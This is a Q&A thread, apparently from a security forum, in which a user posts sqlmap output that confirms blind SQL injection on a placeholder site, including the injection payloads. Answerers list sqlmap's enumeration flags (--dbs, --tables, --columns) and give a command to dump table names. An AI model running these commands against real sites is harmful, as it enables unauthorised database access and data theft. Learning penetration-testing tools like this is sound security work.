8

I'm just started using sqlmap to test for possible SQL injection attacks.

I have got a website which is vulnerable:

C:\Python27>python xxx\sqlmap\sqlmap.py -u http://www.example.com/page.php?id=1

[*] starting at: 19:33:27

[19:33:27] [INFO] using 'xxx\session' as session file
[19:33:27] [INFO] testing connection to the target url
[19:33:31] [INFO] testing if the url is stable, wait a few seconds
[19:33:33] [INFO] url is stable
[19:33:33] [INFO] testing if GET parameter 'id' is dynamic
[19:33:33] [INFO] confirming that GET parameter 'id' is dynamic
[19:33:34] [INFO] GET parameter 'id' is dynamic
[19:33:35] [INFO] heuristic test shows that GET parameter 'id' might be injectab
le (possible DBMS: MySQL)
[19:33:35] [INFO] testing sql injection on GET parameter 'id'
[19:33:35] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:33:39] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVI
NG clause' injectable
[19:33:39] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[19:33:39] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[19:33:40] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[19:34:40] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' in
jectable
[19:34:40] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:34:44] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N]
y
sqlmap identified the following injection points with a total of 29 HTTP(s) requ
ests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 3404=3404

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1 AND SLEEP(5)
---

[19:34:55] [INFO] the back-end DBMS is MySQL

web application technology: PHP 5.2.15
back-end DBMS: MySQL 5.0.11
[19:34:55] [WARNING] HTTP error codes detected during testing:
403 (Forbidden) - 21 times
[19:34:55] [INFO] Fetched data logged to text files under 'xxx\output\www.example.com'

[*] shutting down at: 19:34:55

Now I would like to find out whether it is possible to see if I for example can see all the tables in the database.

What do I have to type in the command line to check this?

kalina
  • 3,354
  • 5
  • 20
  • 36
PeeHaa
  • 599
  • 1
  • 4
  • 15
  • 1
    Just use Havij or Pangolin. You should try to read a manual, or to type --help for help with a command. This is why I'm also downvoting you. – atdre Jun 13 '11 at 19:43
  • Why the profanity? I just didn't realize that the options are called enumeration. ... – PeeHaa Jun 13 '11 at 19:48
  • 3
    whilst you are correct that this was a pretty much RTFM type question, please stick to the [FAQ] - be nice. Also such a comment (but nicer) would be more appropriate as a comment, not an answer. Besides, sometimes it is hard to find something when you don't know what you're looking for.... – AviD Jun 14 '11 at 00:35

2 Answers2

14

What you are asking to find out is called enumeration.

Reading the SQLMap manual under the enumeration topic provides me with the following information:

  • --dbs for databases
  • --tables for tables
  • --columns for columns

There is also a lot of other good information in the manual, so I suggest reading over it if you have more questions about flags and parameters the tool takes.

I've added a blog post about enumeration with SQLMap here: http://www.securesolutions.no/enumeration-with-sqlmap/

Chris Dale
  • 16,119
  • 10
  • 56
  • 97
0

oh you're so close, it's

./sqlmap.py -u http://example.com --tables

apricot boy
  • 101
  • 2